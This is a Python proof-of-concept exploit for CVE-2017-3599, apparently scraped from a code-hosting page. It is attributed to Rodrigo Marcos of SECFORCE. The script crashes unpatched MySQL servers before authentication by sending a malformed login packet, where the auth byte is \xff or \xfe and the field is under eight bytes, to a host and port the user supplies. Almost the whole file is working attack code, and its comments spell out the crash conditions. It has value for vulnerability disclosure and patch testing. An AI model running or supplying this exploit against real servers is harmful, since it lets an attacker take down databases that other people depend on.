114 lines
No EOL
2.8 KiB
Python
Executable file
114 lines
No EOL
2.8 KiB
Python
Executable file
'''
|
|
# Source: https://raw.githubusercontent.com/SECFORCE/CVE-2017-3599/master/cve-2017-3599_poc.py
|
|
# Exploit Title: Remote MySQL DOS (Integer Overflow)
|
|
# Google Dork: N/A
|
|
# Date: 13th April 2017
|
|
# Exploit Author: Rodrigo Marcos
|
|
# Vendor Homepage: https://www.mysql.com/
|
|
# Software Link: https://www.mysql.com/downloads/
|
|
# Version: 5.6.35 and below / 5.7.17 and below
|
|
# Tested on: N/A
|
|
# CVE : CVE-2017-3599
|
|
'''
|
|
|
|
import socket
|
|
import sys
|
|
from struct import pack
|
|
|
|
'''
|
|
CVE-2017-3599 Proof of Concept exploit code.
|
|
|
|
https://www.secforce.com/blog/2017/04/cve-2017-3599-pre-auth-mysql-remote-dos/
|
|
|
|
Rodrigo Marcos
|
|
|
|
'''
|
|
|
|
if len(sys.argv)<2:
|
|
|
|
print "Usage: python " + sys.argv[0] + " host [port]"
|
|
exit(0)
|
|
|
|
else:
|
|
HOST = sys.argv[1]
|
|
|
|
if len(sys.argv)>2:
|
|
PORT = int(sys.argv[2]) # Yes, no error checking... living on the wild side!
|
|
else:
|
|
PORT = 3306
|
|
|
|
print "[+] Creating packet..."
|
|
|
|
'''
|
|
3 bytes Packet lenth
|
|
1 bytes Packet number
|
|
|
|
Login request:
|
|
|
|
Packet format (when the server is 4.1 or newer):
|
|
|
|
Bytes Content
|
|
----- ----
|
|
4 client capabilities
|
|
4 max packet size
|
|
1 charset number
|
|
23 reserved (always 0)
|
|
n user name, \0-terminated
|
|
n plugin auth data (e.g. scramble), length encoded
|
|
n database name, \0-terminated
|
|
(if CLIENT_CONNECT_WITH_DB is set in the capabilities)
|
|
n client auth plugin name - \0-terminated string,
|
|
(if CLIENT_PLUGIN_AUTH is set in the capabilities)
|
|
|
|
'''
|
|
|
|
# packet_len = '\x64\x00\x00'
|
|
|
|
packet_num = '\x01'
|
|
|
|
#Login request packet
|
|
packet_cap = '\x85\xa2\xbf\x01' # client capabilities (default)
|
|
packet_max = '\x00\x00\x00\x01' # max packet size (default)
|
|
packet_cset = '\x21' # charset (default)
|
|
p_reserved = '\x00' * 23 # 23 bytes reserved with nulls (default)
|
|
packet_usr = 'test\x00' # username null terminated (default)
|
|
|
|
packet_auth = '\xff' # both \xff and \xfe crash the server
|
|
|
|
'''
|
|
Conditions to crash:
|
|
|
|
1 - packet_auth must start with \xff or \xfe
|
|
2 - packet_auth must be shorter than 8 chars
|
|
|
|
The expected value is the password, which could be of two different formats
|
|
(null terminated or length encoded) depending on the client functionality.
|
|
'''
|
|
|
|
packet = packet_cap + packet_max + packet_cset + p_reserved + packet_usr + packet_auth
|
|
packet_len = pack('i',len(packet))[:3]
|
|
|
|
request = packet_len + packet_num + packet
|
|
|
|
print "[+] Connecting to host..."
|
|
try:
|
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
s.connect((HOST, PORT))
|
|
print "[+] Connected."
|
|
|
|
except:
|
|
print "[+] Unable to connect to host " + HOST + " on port " + str(PORT) + "."
|
|
s.close()
|
|
print "[+] Exiting."
|
|
exit(0)
|
|
|
|
print "[+] Receiving greeting from remote host..."
|
|
data = s.recv(1024)
|
|
print "[+] Done."
|
|
|
|
print "[+] Sending our payload..."
|
|
s.send(request)
|
|
print "[+] Done."
|
|
#print "Our data: %r" % request
|
|
|
|
s.close() |